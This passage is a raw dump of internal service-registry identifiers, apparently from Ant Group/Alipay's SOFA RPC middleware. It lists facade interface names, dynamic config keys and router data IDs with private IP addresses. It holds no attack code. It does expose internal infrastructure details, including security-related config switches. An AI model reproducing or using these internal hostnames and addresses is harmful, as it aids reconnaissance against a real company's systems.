re.service.facade.OtoAppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mremindprod.common.service.facade.recommend.UserGroupManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebsTransferInEntranceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.regist.ParmInfoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.virtualTableConfigSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.criskcenter.common.service.facade.legal.InfoLegalStrategyAndRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.telemarketing.TelemarketingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbservcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcreditmng_processCallbackHub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.ModifyRecordAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.biz.activity.service.DiscountBudgetManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.spider.SpiderConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.ArchimedesPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IPROBE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.pdcore.common.util.prodquery.PQDRMConfig.localcacheQueryRoad,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.market.rpc.facade.ServiceCouponFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.community.CommunityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.capitalRecoverySchedulerConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:loginantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.campaign.mng.AiStrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeDepositbackHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.common.service.integration.msgbroker.UniformEventClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-antresourcetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.127.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.manage.gildata.GdDividendSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.biz.process.baoxian.CpBaoxianService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:paycoreDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ESMP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfluxcore.common.service.facade.inst.order.InstAcceptanceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.137.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_HOHO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.158.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scheduler.cluster.config.serverlist.prod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundmng.biz.service.monitor.SyncProfitMonitorStatService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:cancelSignContractHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.MetricGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.taskRetry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.common.manage.facade.api.solution.BaseActivityTypeEnumService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.alipay.fraudmng.core.service.riskcontrol.resource.BatchOperateConfigResource.isOpenStrictConditionPropertys,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.fininfo.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.UserFacade:1.0:shangcheng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:idpatrol@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.antbuservice:name=com.alipay.zcache.tbase.ALIPAYBUMNGJSESSIONID.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.sync.FinstrategySwitchConfigDrmImpl.changeSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwalm.core.service.fluidmng.task.TaskProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csaccurate.service.facade.mng.api.DataModelService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:antshellweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.184.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocore.common.service.facade.GrpCampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.ability.RopDataSourceFacade:1.0:miniProgramCurrentVersion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListPrePubSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.manage.MsContentBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.understand.BusinessContentFeatureRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.121.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.loadcontroller.common.facade.AgentDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IPAYCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmerchantprod.common.service.facade.applet.baas.MerchOperatorInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeapcore.service.api.TradeRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.ContactQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.tairWhiteListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.25.178.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.service.facade.AutoCompanyItemRelationFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:globalprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.recommend.TransportRecommendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.bumng_gc_v20200807.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.137.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.142.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imemberprod.service.facade.api.UserAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.MerchantItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.MailContactSendService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.campaign.CampaignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.industry.IndustryPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.ComplainConclusionSwitchImpl.autoEndPostCreate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.schedule.operation.platform.facade.instance.InstancePageListApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:scard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vehownerprod.facade.vehplatform.VehicleMsgTemplateConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.activity.IndustryPlanDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bizinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxSpecificPid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipromotion.common.service.facade.api.campaign.PrizeAwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.core.service.detect.EcoIdeDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.157.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.integration.prodtrans.ProdtransQueryExtFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.sandbox.biz.shared.chain.ChainTriggerResource.resources,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstdata.common.service.facade.service.instdatamng.InstDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.AccountOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.refund.PcreditRefundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.mng.PushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dwdssp_smartbiz_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers__NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchprod.common.service.facade.businessarea.MrchProdBusinessAreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.identify.FinIdentifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditquery.common.api.PcreditQueryPaymentOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.CommonConfigQueryService:1.0.0:commonConfigQuery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:isdsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antforest:name=com.alipay.antforest.core.drd.container.loaders.DrmConfigLoader.deleteConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.component.ComponentBizDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.landlordgame.facade.api.BoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.20.1.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcontent.common.service.facade.api.article.ArticleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityLibraryProjectGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:tiyubiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.74.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcinstacc.facade.quality.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.AuthenticateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.identifycore.common.service.manage.api.IdentifySceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acquotacore.facade.QuotaInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaCustomChangeDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.grade.GrowthValueService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quickrun.common.service.api.DataRunFacade:1.0:frastress@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finriskeventseek.facade.ChangeRiskCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.core.service.fluidmng.manage.groovy.GroovyRunService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.BUQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:govbizwebdeploy#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.huoyan.merchant.SubMerCompare:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.SeatFacade:1.0:orgSeatFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditamount.service.PcreditAmountRecoveryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenReplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.MYBKL2AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.changeevent.ChangeEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.degradeMsgSceneQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.ProfileViewQueryFacade:1.0:zhima@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.mkt.AutoCouponQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.InstpayLockControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.task.MsgTaskTriggerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.control.api.QueryStdTrusteeOrderFacade:1.0:antzproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtaskcenter.common.service.facade.instance.TaskInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oasis.common.service.facade.service.provider.TrustedJsonService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.service.facade.datapoint.LocalDataPointValidateService:1.0:mctu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-ExClient-Scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.accustomerweb.common.service.facade.UserAccessInfoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amlmatrix.common.service.facade.sanction.api.CaseManualReviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:loginxiaowei@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:airmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.quality.ArgoQualityCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.overseapcard.api.OSPCardtransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.core.service.elm.ElmOrderInfoSnapShotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mfinpromo.MfinpromoEquityInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PRODUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.124.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_PARTNER_FOCUS_TIMER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkloansupport.common.service.facade.risk.reorganization.RiskReorganizationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlescenter.common.service.facade.api.AesSignFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.offline.FeatureCleanJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcdp.common.service.facade.calendar.KbcdpCalendarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:finassetbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.EventExeRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsContractDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.stream.facade.ClusterFilterSourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.coupon.CouponTemplateManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.facade.MenuAuthenticationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.apacc.common.service.facade.module.ModuleActionEventFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:activityConfigCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.analysis.AnalysisH5NebulaChangeRecordDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SceneProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insxhbprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkstmtcore.common.service.facade.statement.loan.LendApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.EntityMsgTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.DataStructManageService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.battle.isCloseBattleHomeQueryBattleFieldHome,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.productcenter.common.service.facade.rest.ProductPropertyManageSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apgauss.common.service.facade.api.RecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdTaskModuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.config.api.SceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:zeroxrisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.bluearmyprod.core.service.drm.DBConfigDRMConfig.forceUpdate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:jiyun@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iamlmng.biz.verify.common.interfaces.SanctionCommService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.solpromo.facade.api.mng.SceneParmMntListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantRelationPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.backend.service.facade.appname.AppNameServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvoice.common.service.facade.api.EinvInvoiceFileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:orderRefundHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilerelation.common.service.facade.tlou.TlouRelationV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antthoth.service.facade.TrainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.93.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.109.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.StockNewShareFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.129.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pushcore.facade.PushDeviceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.loadAccountingTaskSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingRuleCacheDRM.clearingRuleCacheDown,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.pms.facade.PmsRepositoryFacade:1.0:pms-ws@XF